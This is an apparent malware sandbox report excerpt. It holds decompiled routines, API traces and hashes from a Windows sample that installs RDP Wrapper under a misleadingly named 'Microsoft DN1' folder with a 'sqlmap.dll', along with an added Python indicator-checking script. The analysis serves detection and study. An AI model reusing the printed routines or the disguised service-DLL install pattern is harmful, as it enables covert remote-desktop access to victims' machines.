                                      • API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
                                      • String ID: %ProgramFiles%$%ProgramW6432%$TermService$\Microsoft DN1$\rdpwrap.ini$\sqlmap.dll
                                      • API String ID: 2811233055-2974354589
                                      • Opcode ID: 9d83add256c8c44cd92fa4fb96a2fc01e0b0fac5c4a2618e3395d0e40174b29d
                                      • Instruction ID: 097455e8c64876216a54485ab53261bb30d8750e3eac8d736681e2c32ba9d1ed
                                      • Opcode Fuzzy Hash: 9d83add256c8c44cd92fa4fb96a2fc01e0b0fac5c4a2618e3395d0e40174b29d
                                      • Instruction Fuzzy Hash: 1131D860F1420067D704BF2AAC8253E66A99FCDB0DF11647FB00697292DF7C8E42879C
                                      Uniqueness

                                      Uniqueness Score: 100.00%
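The three global strings this initialiser fills in translate directly into host indicators. The Python below is an added example, not code from the sample or from the Joe Sandbox report: it rebuilds the expanded sqlmap.dll and rdpwrap.ini paths and the unexpanded template the same way E0043C987 does, then checks a constructed directory listing and a constructed TermService ServiceDll value against them. Two things are assumptions rather than facts from the report: that a dropped rdpwrap DLL ends up registered as the TermService service DLL (the report only shows the "TermService" string), and that E0043DBF3() == 1 means "running under WOW64" (based on %ProgramW6432% existing only in that case). The environment, file list and registry value are constructed inputs.

```python
"""Rebuild and check the RDP Wrapper install paths from E0043C987.

Added example (not from the sample or the report). See the lead-in for
which parts are assumptions.
"""
from __future__ import annotations

from typing import Iterable, Mapping

INSTALL_SUBDIR = "\\Microsoft DN1"
DLL_NAME = "\\sqlmap.dll"
INI_NAME = "\\rdpwrap.ini"
# Default ServiceDll of HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters
TERMSRV_DEFAULT = "%SystemRoot%\\System32\\termsrv.dll"


def expand_env(template: str, env: Mapping[str, str]) -> str:
    """Minimal stand-in for ExpandEnvironmentStringsW: %NAME% -> env[NAME];
    names that are not defined stay unexpanded, as on Windows."""
    out: list[str] = []
    i = 0
    while i < len(template):
        j = template.find("%", i + 1) if template[i] == "%" else -1
        if j > i and template[i + 1:j] in env:
            out.append(env[template[i + 1:j]])
            i = j + 1
        else:
            out.append(template[i])
            i += 1
    return "".join(out)


def rdpwrap_paths(env: Mapping[str, str], wow64: bool) -> dict[str, str]:
    """Mirror the function's construction. Under WOW64 (assumed meaning of
    E0043DBF3() == 1) it expands %ProgramW6432%, the 64-bit Program Files,
    instead of %ProgramFiles%; the template slot keeps "%ProgramFiles%"
    unexpanded in both branches."""
    base = expand_env("%ProgramW6432%" if wow64 else "%ProgramFiles%", env) + INSTALL_SUBDIR
    return {
        "dll": base + DLL_NAME,                                    # global 0x447d10
        "ini": base + INI_NAME,                                    # global 0x447d14
        "template": "%ProgramFiles%" + INSTALL_SUBDIR + DLL_NAME,  # global 0x447d0c
    }


def find_indicators(paths: Mapping[str, str], files: Iterable[str],
                    termservice_servicedll: str) -> list[str]:
    """Compare observed artefacts with the expected paths. Windows paths are
    case-insensitive, so everything is lower-cased first."""
    present = {f.lower() for f in files}
    hits = []
    if paths["dll"].lower() in present:
        hits.append("sqlmap.dll present in Microsoft DN1")
    if paths["ini"].lower() in present:
        hits.append("rdpwrap.ini present in Microsoft DN1")
    # Assumption: the dropped DLL is registered as the TermService ServiceDll.
    # The sample keeps the unexpanded %ProgramFiles% form, which is what a
    # REG_EXPAND_SZ value would hold; the fully expanded path is accepted too.
    sd = termservice_servicedll.lower()
    if sd != TERMSRV_DEFAULT.lower() and sd in (paths["template"].lower(), paths["dll"].lower()):
        hits.append("TermService ServiceDll points at the dropped DLL")
    return hits


# Constructed inputs (not taken from the report): a 32-bit process on 64-bit
# Windows, a directory listing and a replaced ServiceDll value.
SAMPLE_ENV = {"ProgramFiles": "C:\\Program Files (x86)", "ProgramW6432": "C:\\Program Files"}
SAMPLE_FILES = [
    "C:\\Program Files\\Microsoft DN1\\sqlmap.dll",
    "C:\\Program Files\\Microsoft DN1\\rdpwrap.ini",
    "C:\\Windows\\System32\\termsrv.dll",
]
SAMPLE_SERVICEDLL = "%ProgramFiles%\\Microsoft DN1\\sqlmap.dll"


if __name__ == "__main__":
    expected = rdpwrap_paths(SAMPLE_ENV, wow64=True)
    for hit in find_indicators(expected, SAMPLE_FILES, SAMPLE_SERVICEDLL):
        print(hit)
```

On a live host the file list would come from the real directory and the ServiceDll from the registry; the comparison logic stays the same.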

Control-flow Graph
• Rendered interactively on the original page; not reproduced here. Basic blocks 0xcc62f8-0xcc63be. API calls: LoadLibraryExW (two call sites), GetLastError, FreeLibrary. Internal calls: 0xcc5be1. No decompiled C code is given for this function; with the "api-ms-"/"ext-ms-" strings listed under Similarity it has the shape of the statically linked C runtime's API-set-aware LoadLibrary helper rather than sample-specific logic.
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
• Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
• Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
• Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
• Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
• Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: api-ms-$ext-ms-
                                      • API String ID: 0-537541572
                                      • Opcode ID: 24b7b453efaf2544496cdfb35e725402bae4a7c5435630751514d1faca747851
                                      • Instruction ID: 191f382599201840971ead1e611144055b6d080dfb90a22e0e90786cc5c369ca
                                      • Opcode Fuzzy Hash: 24b7b453efaf2544496cdfb35e725402bae4a7c5435630751514d1faca747851
                                      • Instruction Fuzzy Hash: 1E212731E012A1EBCB314A76DE85F6E77689F45760F28021DFD65AB2B1DA30EE0095E0
                                      Uniqueness

                                      Uniqueness Score: 3.32%

Control-flow Graph
• Rendered interactively on the original page; not reproduced here. Basic blocks 0xcd1106-0xcd117f, plus a block the decompiler reports as 0xcd1137-0xcd7a10 on the socket() failure path, which is probably a misdecoded region rather than real code. Call sequence: WSAStartup, socket, inet_addr, htons, connect (see APIs below). The socket is AF_INET/SOCK_STREAM/IPPROTO_TCP and the connect target is 8.8.8.8 on port 53 (htons(0x35)), i.e. a TCP connection to a public DNS resolver, not a UDP DNS query; what the result is used for lies outside this function.
                                      APIs
                                      • WSAStartup.WS2_32(00000202,?), ref: 00CD1119
                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00CD1128
                                      • inet_addr.WS2_32(8.8.8.8), ref: 00CD114A
                                      • htons.WS2_32(00000035), ref: 00CD1155
                                      • connect.WS2_32(FFFFFFFF,?,00000010), ref: 00CD1169
                                      Strings
Memory Dump Source
• Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true (associated dumps as listed for the previous 00CC0000 entry)
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: Startupconnecthtonsinet_addrsocket
                                      • String ID: 8.8.8.8
                                      • API String ID: 4117409672-3817307869
                                      • Opcode ID: fdbbfc11f6065c88d4c8d9cc96ca714610d05a449406654a62abbd33d00da74a
                                      • Instruction ID: ad03f37bc3ed6cabf112921624288c0d4d1c24436d55eb1f34dda53e2d91dc1f
                                      • Opcode Fuzzy Hash: fdbbfc11f6065c88d4c8d9cc96ca714610d05a449406654a62abbd33d00da74a
                                      • Instruction Fuzzy Hash: D801E574D00259EFDB209FA0EC49BEDB634AB09721F00831AEA316A2E0D7B40941DF61
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Control-flow Graph (rendered graph not preserved; legend: Executed / Not Executed)
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CC4206,00CC4206,?,?,?,00CCB727,00000001,00000001,77E85006), ref: 00CCB567
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,00000000,?,?,?,00CCB727,00000001,00000001,77E85006,?,?,?), ref: 00CCB5D0
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,77E85006,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 00CCB6B0
                                      • __freea.LIBCMT ref: 00CCB6BD
                                        • Part of subcall function 00CC6EDF: HeapAlloc.KERNEL32(00000000,?,?,?,00CC852B,00001000,?,?,?,?,00CC3843), ref: 00CC6F11
                                      • __freea.LIBCMT ref: 00CCB6C6
                                      • __freea.LIBCMT ref: 00CCB6EB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocHeap
                                      • String ID:
                                      • API String ID: 3147120248-0
                                      • Opcode ID: 92132620736834e6f3b7aba126a40713ab0ed88c79702b5c26b6f583368b3ca6
                                      • Instruction ID: 9dd38b03d619431034ed769c77d8e549bc20c6920d74c0cb27c3acda9ecda56b
                                      • Opcode Fuzzy Hash: 92132620736834e6f3b7aba126a40713ab0ed88c79702b5c26b6f583368b3ca6
                                      • Instruction Fuzzy Hash: 65519F7260021AAFDB299FA4CC46FAF7BA9EF44750F25012DFD14A7250D770DE10A7A0
                                      Uniqueness

                                      Uniqueness Score: 0.04%

                                      Control-flow Graph (rendered graph not preserved; legend: Executed / Not Executed)
                                      C-Code - Quality: 37%
                                      			E0043538F(void* __ecx, void* __eflags, char _a4, intOrPtr _a8) {
                                      				// Decompiled connect routine: resolves the host name in _a4, opens a TCP
                                      				// socket and connects it to port _a8. The WS2_32 ordinal imports (#23, #9,
                                      				// #4) are socket, htons and connect, as the APIs list below also records.
                                      				signed int _v8;          // ADDRINFOA* result filled in by getaddrinfo
                                      				intOrPtr _v28;           // hints.ai_protocol
                                      				intOrPtr _v32;           // hints.ai_socktype
                                      				void _v40;               // ADDRINFOA hints (32 bytes on x86)
                                      				void* _t36;
                                      				signed int _t40;
                                      				signed int _t42;
                                      				void* _t44;              // this pointer (object holding the socket state)
                                      				signed int _t47;
                                      				intOrPtr _t53;           // return value, 1 = connected
                                      				intOrPtr _t54;
                                      				signed int* _t55;
                                      
                                      				_v8 = _v8 & 0x00000000;                   // result = NULL
                                      				_t44 = __ecx; // executed
                                      				E00432F52(__ecx,  &_a4); // executed     // subcall on the host string (uses lstrcatA, see APIs list)
                                      				 *((intOrPtr*)(_t44 + 4)) = _a8;          // this->port = _a8
                                      				E0043E20D(_t44 + 0x1d8);                  // subcall; WaitForSingleObject on the mutex stored at +0x1d8
                                      				_t47 = 8;
                                      				memset( &_v40, 0, _t47 << 2);             // zero the 32-byte hints structure
                                      				_v28 = 6;                                 // hints.ai_protocol = IPPROTO_TCP
                                      				_t36 =  &_v40;
                                      				_t53 = 1;
                                      				_v32 = 1;                                 // hints.ai_socktype = SOCK_STREAM
                                      				__imp__getaddrinfo(_a4, 0, _t36,  &_v8);  // getaddrinfo(host, NULL, &hints, &result)
                                      				if(_t36 != 0) {                           // nonzero return: name resolution failed
                                      					L4:
                                      					_t53 = 0;
                                      				} else {
                                      					_t54 =  *((intOrPtr*)(_v8 + 0x18));   // result->ai_addr (sockaddr_in*)
                                      					_t40 = 2;
                                      					__imp__#23(_t40, 1, 0); // executed   // socket(AF_INET, SOCK_STREAM, 0)
                                      					 *(_t44 + 0xc) = _t40;                // this->sock
                                      					if(_t40 == 0xffffffff) {              // INVALID_SOCKET
                                      						goto L4;
                                      					} else {
                                      						_t55 = _t44 + 0x1c8;              // this->addr, a sockaddr_in at +0x1c8
                                      						 *((intOrPtr*)(_t44 + 0x1cc)) =  *((intOrPtr*)(_t54 + 4)); // addr.sin_addr = ai_addr->sin_addr
                                      						_t42 = 2;
                                      						 *_t55 = _t42;                    // addr.sin_family = AF_INET
                                      						__imp__#9(_a8);                   // htons(port); the decompiler tracks eax as _t42
                                      						 *(_t44 + 0x1ca) = _t42;          // addr.sin_port = htons(port)
                                      						__imp__freeaddrinfo(_v8);
                                      						__imp__#4( *(_t44 + 0xc), _t55, 0x10); // executed   // connect(sock, &addr, sizeof(sockaddr_in))
                                      						if(_t42 != 0xffffffff) {          // not SOCKET_ERROR
                                      							 *((intOrPtr*)(_t44 + 8)) = 1; // this->connected = 1
                                      							ReleaseMutex( *(_t44 + 0x1d8));
                                      						} else {
                                      							 *(_t44 + 0xc) =  *(_t44 + 0xc) | _t42;   // this->sock = INVALID_SOCKET
                                      							goto L4;
                                      						}
                                      					}
                                      				}
                                      				E00435A2D(_a4);                           // subcall on the host argument (body not shown)
                                      				return _t53;
                                      			}
                                      

                                      APIs
                                        • Part of subcall function 00432F52: lstrcatA.KERNEL32(00000000,?,?,00000000,?,004333F1,00000000,00000000,?,00434AC0,?,?,?,?,?), ref: 00432F7E
                                        • Part of subcall function 0043E20D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0043E211
                                      • getaddrinfo.WS2_32(?,00000000,00434AC8,00000000), ref: 004353DC
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 004353F3
                                      • htons.WS2_32(?), ref: 00435419
                                      • freeaddrinfo.WS2_32(00000000), ref: 00435429
                                      • connect.WS2_32(?,?,00000010), ref: 00435435
                                      • ReleaseMutex.KERNEL32(?), ref: 0043545F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
                                      • String ID:
                                      • API String ID: 2516106447-0
                                      • Opcode ID: 20020a6c0c87330d747629eec0c515b7ab0422b729944ed941ba60f9a3b2e4d9
                                      • Instruction ID: 969e3bd66ebb8d65cd28fcb9d89dfbf07ed3c3acd865b1df09c1b26d1768c3ec
                                      • Opcode Fuzzy Hash: 20020a6c0c87330d747629eec0c515b7ab0422b729944ed941ba60f9a3b2e4d9
                                      • Instruction Fuzzy Hash: 52219F75A00204ABDF10DF61D988BDA7BB8FF48325F108066FD09EB291D7749A41CB64
                                      Uniqueness

                                      Uniqueness Score: 8.94%

                                      Control-flow Graph (rendered graph not preserved; legend: Executed / Not Executed)
                                      C-Code - Quality: 100%
                                      			E0043586A() {
                                      				// Decompiled CRT-style entry point: skips the (possibly quoted) program
                                      				// name in the command line, fetches the startup info, runs the program
                                      				// body and exits the process with its return value.
                                      				struct _STARTUPINFOA _v72;
                                      				intOrPtr _t6;            // current command-line character
                                      				int _t11;                // exit code returned by the program body
                                      				intOrPtr _t15;
                                      				intOrPtr* _t16;          // command-line cursor
                                      				intOrPtr* _t18;
                                      				intOrPtr _t20;
                                      				void* _t21;
                                      
                                      				_t16 = GetCommandLineA();
                                      				_t6 =  *_t16;
                                      				if(_t6 != 0x22) {                          // program name is not quoted
                                      					while(1) {                             // skip up to the first space or control character
                                      						__eflags = _t6 - 0x20;
                                      						if(_t6 <= 0x20) {
                                      							break;
                                      						}
                                      						_t16 = _t16 + 1;
                                      						__eflags = _t16;
                                      						_t6 =  *_t16;
                                      					}
                                      					L12:
                                      					if(_t6 != 0) {                         // skip whitespace preceding the arguments
                                      						__eflags = _t6 - 0x20;
                                      						if(_t6 > 0x20) {
                                      							goto L13;
                                      						}
                                      						_t16 = _t16 + 1;
                                      						__eflags = _t16;
                                      						L11:
                                      						_t6 =  *_t16;
                                      						goto L12;
                                      					}
                                      					L13:
                                      					_t2 =  &(_v72.dwFlags);
                                      					_v72.dwFlags = _v72.dwFlags & 0x00000000;
                                      					GetStartupInfoA( &_v72);
                                      					E004358F8();                           // subcall, body not shown
                                      					E00435925(0x446000, 0x44602c);         // subcall, body not shown
                                      					GetModuleHandleA(0);
                                      					_t11 = E004411D0(0x44602c, _t21,  *_t2, 0x446000, 0x446000); // executed   // program body; its return becomes the exit code
                                      					E0043590D();                           // subcall, body not shown
                                      					ExitProcess(_t11);
                                      				}
                                      				_t18 = _t16 + 1;                           // quoted program name: advance to the closing quote
                                      				_t20 =  *_t18;
                                      				if(_t20 == 0) {
                                      					L5:
                                      					_t1 = _t18 + 1; // 0x3
                                      					_t14 =  !=  ? _t18 : _t1;              // decompiler could not recover the condition here
                                      					_t16 =  !=  ? _t18 : _t1;
                                      					goto L11;
                                      				}
                                      				_t15 = _t20;
                                      				while(1) {
                                      					_t20 = _t15;
                                      					if(_t15 == 0x22) {                     // closing double quote found
                                      						goto L5;
                                      					}
                                      					_t18 = _t18 + 1;
                                      					_t20 =  *_t18;
                                      					_t15 = _t20;
                                      					if(_t20 != 0) {
                                      						continue;
                                      					}
                                      					goto L5;
                                      				}
                                      				goto L5;
                                      			}
                                      

                                      APIs
                                      • GetCommandLineA.KERNEL32 ref: 00435871
                                      • GetStartupInfoA.KERNEL32(?), ref: 004358C0
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 004358DC
                                      • ExitProcess.KERNEL32 ref: 004358F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                      • String ID: ,`D
                                      • API String ID: 2164999147-3663366328
                                      • Opcode ID: b3805b4b3436125417399c6f6ab153c565ce5765d4b2e0dfda77009439d19a91
                                      • Instruction ID: 2d05f8276725d76bbfa8c054ae3e85e8ed4f56659e411ca5755f9e9e5f96b904
                                      • Opcode Fuzzy Hash: b3805b4b3436125417399c6f6ab153c565ce5765d4b2e0dfda77009439d19a91
                                      • Instruction Fuzzy Hash: AD01D628104A445EEB287B78A8862EA3B9A9F0F348F64345AE182C7312C71E0C578A5D
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Control-flow Graph (rendered graph not preserved; legend: Executed / Not Executed)
                                      C-Code - Quality: 40%
                                      			E0043EBD4(intOrPtr* __ecx) {
                                      				// Decompiled WOW64 check: resolves IsWow64Process at run time (the export
                                      				// is absent on older kernel32 builds) and returns the flag it reports for
                                      				// the process handle stored at *__ecx; zero when the export is missing.
                                      				signed int _v8;                          // BOOL output of IsWow64Process
                                      				_Unknown_base(*)()* _t6;                 // resolved function pointer
                                      				intOrPtr* _t12;
                                      
                                      				_push(__ecx);
                                      				_v8 = _v8 & 0x00000000;                  // default: not running under WOW64
                                      				_t12 = __ecx;
                                      				_t6 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                      				if(_t6 != 0) {
                                      					 *_t6( *_t12,  &_v8); // executed    // IsWow64Process(hProcess, &_v8)
                                      				}
                                      				return _v8;
                                      			}
                                      

                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0043DC08,?,?,00432BBD,?,00442608,?,?,00000000,?), ref: 0043EBE9
                                      • GetProcAddress.KERNEL32(00000000,?,0043DC08,?,?,00432BBD,?,00442608,?,?,00000000,?), ref: 0043EBF0
                                      • IsWow64Process.KERNEL32(?,00000000,?,0043DC08,?,?,00432BBD,?,00442608,?,?,00000000,?), ref: 0043EC00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProcProcessWow64
                                      • String ID: IsWow64Process$kernel32
                                      • API String ID: 1818662866-3789238822
                                      • Opcode ID: 0a251a2f8c94d37595d48560dd08c74086abe35261c6b1a19491beee3e02f12f
                                      • Instruction ID: e51506f455c3203213d13555d93e4d5a1a11277cce30c91eef181f2d1b7eddff
                                      • Opcode Fuzzy Hash: 0a251a2f8c94d37595d48560dd08c74086abe35261c6b1a19491beee3e02f12f
                                      • Instruction Fuzzy Hash: B7E08C36600204FBEB24DB91DD0AB8E7ABCEB45750F200559B902E2080DAB8EE00C698
                                      Uniqueness

                                      Uniqueness Score: 2.28%

                                      Control-flow Graph (rendered graph not preserved; legend: Executed / Not Executed)
                                      APIs
                                      • GetNativeSystemInfo.KERNEL32(?,?,?,?,00410005), ref: 004100EB
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,00410005), ref: 00410113
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, Offset: 00410000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_410000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocInfoNativeSystemVirtual
                                      • String ID:
                                      • API String ID: 2032221330-0
                                      • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                                      • Instruction ID: 424d0fb78361447582b65204010cf142d8cbab5b758a1d11f1574a3a191eab5d
                                      • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                                      • Instruction Fuzzy Hash: E5E1B071A043069FDB24DF19C8847AAB7E0BF94308F18456EE8959B341E7B8ECC5CB95
                                      Uniqueness

                                      Uniqueness Score: 2.84%

                                      Control-flow Graph

                                      C-Code - Quality: 100%
                                      			#include <windows.h>
                                      
                                      			/* Decompiled by Joe Sandbox; comments added. Opens the current process token with
                                      			   TOKEN_QUERY (8) and queries TokenIntegrityLevel (0x14) into a 4-byte buffer, i.e. only
                                      			   the Label.Sid pointer of TOKEN_MANDATORY_LABEL. Returns non-zero only if that query
                                      			   succeeds and the returned value is non-zero. */
                                      			int E0043DB97() {
                                      				void* _v8;   /* token handle */
                                      				long _v12;   /* returned length */
                                      				void* _v16;  /* first 4 bytes of TOKEN_MANDATORY_LABEL */
                                      				long _t21;
                                      				void* _t22;
                                      
                                      				_t22 = 0;
                                      				_v8 = 0;
                                      				if(OpenProcessToken(GetCurrentProcess(), 8, &_v8) != 0) {
                                      					_t21 = 4;
                                      					_v12 = _t21;
                                      					/* the decompiler output lost the left operand of this comparison; the
                                      					   control-flow graph shows it is the return value of GetTokenInformation */
                                      					_t21 = GetTokenInformation(_v8, 0x14, &_v16, _t21, &_v12); // executed
                                      					_t22 = _t21 != 0 ? _v16 : 0;
                                      				}
                                      				if(_v8 != 0) {
                                      					CloseHandle(_v8); // executed
                                      				}
                                      				return _t22 != 0;
                                      			}

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0043DBA9
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0043DBB0
                                      • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0043DBCE
                                      • CloseHandle.KERNEL32(00000000), ref: 0043DBE3
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                      • String ID:
                                      • API String ID: 215268677-0
                                      • Opcode ID: 464588851dbd46035742a9ce994544ebea6c51308f75a1e164b26573db2b0244
                                      • Instruction ID: 4c94e2b01d42d43fe2c2185eede2d7187b662b4eef76c32e058b9fe322327e88
                                      • Opcode Fuzzy Hash: 464588851dbd46035742a9ce994544ebea6c51308f75a1e164b26573db2b0244
                                      • Instruction Fuzzy Hash: 14F0EC75D00218FBDB119BA09D09ADEBBB8EF09701F514065AA01A61A0D7749E48DA94
                                      Uniqueness

                                      Uniqueness Score: 0.13%

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00CC8B66: GetOEMCP.KERNEL32(00000000,00CC8DED,?,00CC4B35,00D92144,00D92144,00CC4B35), ref: 00CC8B91
                                      • GetACP.KERNEL32(00000000,FFF475FF,?,?,?,00CC8E34,?,00000000,?,?,?,?,?,?,00D92144,00CC4B35), ref: 00CC904A
                                      • IsValidCodePage.KERNEL32(-00000030,00000000,FFF475FF,?,?,?,00CC8E34,?,00000000,?,?,?,?,?,?,00D92144), ref: 00CC905C
                                      • GetCPInfo.KERNEL32(00000000,00CC8E34,?,?,00CC8E34,?,00000000,?,?,?,?,?,?,00D92144,00CC4B35), ref: 00CC906F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: CodeInfoPageValid
                                      • String ID:
                                      • API String ID: 546120528-0
                                      • Opcode ID: 7fa003f0ab215efaff022a8cecde3f76a44ce9f64d6d32a53bc9d62c97b175c0
                                      • Instruction ID: 635a10c6e0c62211e5d3810b4b6053ffdd756277970207864c5256f8a1f4c43d
                                      • Opcode Fuzzy Hash: 7fa003f0ab215efaff022a8cecde3f76a44ce9f64d6d32a53bc9d62c97b175c0
                                      • Instruction Fuzzy Hash: B15155719003469FDB208F66C88EFBFBBB5EF05300F18406ED4A68B152D7359A459B91
                                      Uniqueness

                                      Uniqueness Score: 2.59%

                                      APIs
                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,?), ref: 00CC8C63
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: Info
                                      • String ID:
                                      • API String ID: 1807457897-3916222277
                                      • Opcode ID: 6f2823c7fa8bfb267a178d5602ca2b98c734c27e954dbc690dd2a60f20d8ed0d
                                      • Instruction ID: ebc5e758f70b53143c114e1614cf5c6e2082e52e63c22d79647911a9f448eba6
                                      • Opcode Fuzzy Hash: 6f2823c7fa8bfb267a178d5602ca2b98c734c27e954dbc690dd2a60f20d8ed0d
                                      • Instruction Fuzzy Hash: D04125B05043889ADF228E25CC84FFBBBA9EB55704F1404EDE59A86182D635AE499F60
                                      Uniqueness

                                      Uniqueness Score: 0.05%

                                      APIs
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00CC663F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: CountCriticalInitializeSectionSpin
                                      • String ID: InitializeCriticalSectionEx
                                      • API String ID: 2593887523-3084827643
                                      • Opcode ID: 64b709466c9193492a36f763d1be78b7964447ad9fc1555b37430d01af4d637a
                                      • Instruction ID: bd5fd8bc417757fb5eae70d52a6d4db0d26da6329e4de6aac72bc6c0202af7c7
